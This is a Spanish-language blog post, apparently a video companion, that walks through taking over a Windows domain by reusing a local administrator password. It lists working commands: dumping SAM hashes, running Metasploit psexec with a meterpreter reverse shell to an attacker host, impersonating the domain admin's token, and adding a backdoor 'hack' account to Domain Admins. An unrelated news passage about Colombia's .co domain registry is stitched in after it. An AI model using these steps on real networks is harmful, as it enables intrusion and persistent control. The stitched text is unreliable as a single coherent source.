En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:

REQUISITOS

• Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
• Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
• Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
• Una copia de BackTrack 4

Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:

Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:

• mount /dev/sda1 /mnt/sda1
  Montamos la particion de la maquina windows
• cd /mnt/sda1/WINDOWS/system32/config
  accedemos a la carpeta dodne se encuentra el archivo SAM
• samdump2 system SAM
  sacamos los hash de los usuarios en la maquina windows
• msfconsole
  ejecutamos el metasploit por consola
• use windows/smb/psexec
  utilizamos el psexec
• exploit -p windows/meterpreter/reverse_tcp -o
  utilizamos la shell meterpreter
• LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
  configuramos las opciones del exploit
• sessions -i 1
  una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra
• use incognito
  utilizamos el modulo incognito de meterpreter
• list_tokens -u
  mostramos los tokens
• impersonate_token mydomain\\domainadmin
  tomamos las credenciales del administrador de dominio
• execute -f cmd.exe -i -t
  lanzamos la consola de windows
• net user hack MPass5678 /add /domain
  Agregamos el usuario “hack” con clave “MPass46782″ al dominio
• net group “Domain Admins” hack /add /domain
  metemos el usuario hack al grupo de administradores de dominio
• Ya hemos tomado el control del dominio de windows

Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.

PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de aprendizaje.

También puede interesarte...

• Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Curso Completo de Metasploit Framework
• winAUTOPWN – Ataques automáticos de entornos Windows
• Así fue el Hacking Day en Medellín – Pentesting con Backtrack
• Cómo funcionan y se crackean las claves en sistemas Windows
• BackTrack 5

Las empresas que resulten seleccionadas, después del proceso licitatorio correspondiente, tendrán como responsabilidad administrar los registros existentes, mantener la base de datos maestra y permitir la publicación en Internet de los nuevos dominios.

También se decidió que para preservar la transparencia de los usuarios, garantizando la continuidad de los registros existentes y siendo congruente con las directrices que sobre la materia se tienen a nivel nacional e internacional, el Ministerio creará un Consejo Asesor que tendrá por objeto asesorar en la fijación de las políticas necesarias para el desarrollo, promoción y fortalecimiento del nombre de dominio de Internet bajo el código de país correspondiente a Colombia .co.

El Consejo Asesor estará integrado por los Ministerios de Comunicaciones, Industria y Comercio, y de Interior y Justicia, la Universidad de Los Andes, un delegado de los profesores universitarios y un empresario seleccionados por la Ministra de Comunicaciones.

También se contratará una firma auditora para que realice el seguimiento y control de cada uno de los permisos de registro de dominio otorgados, de acuerdo con las políticas adoptadas.

Según lo informó el Ministerio, se mantendrán los registros de segundo nivel (.com.co, .edu.co, gov.co, etc) y se examinará la posibilidad de otorgar registros de primer nivel (.co), que identifiquen a Colombia.

También puede interesarte...

• Respuesta jurídica frente ataques informáticos
• Talleres de Matias Katz en el ACK Security Conference
• Taller de Carlos Mario Penagos en el ACK Security Conference
• Taller de Lorenzo Martinez en el ACK Security Conference
• Taller de Leonardo Pigñer en el ACK Security Conference
• Taller de Deviant Ollam en el ACK Security Conference
• Call for Papers abierto para el ACK Security Conference
• ACK Security Conference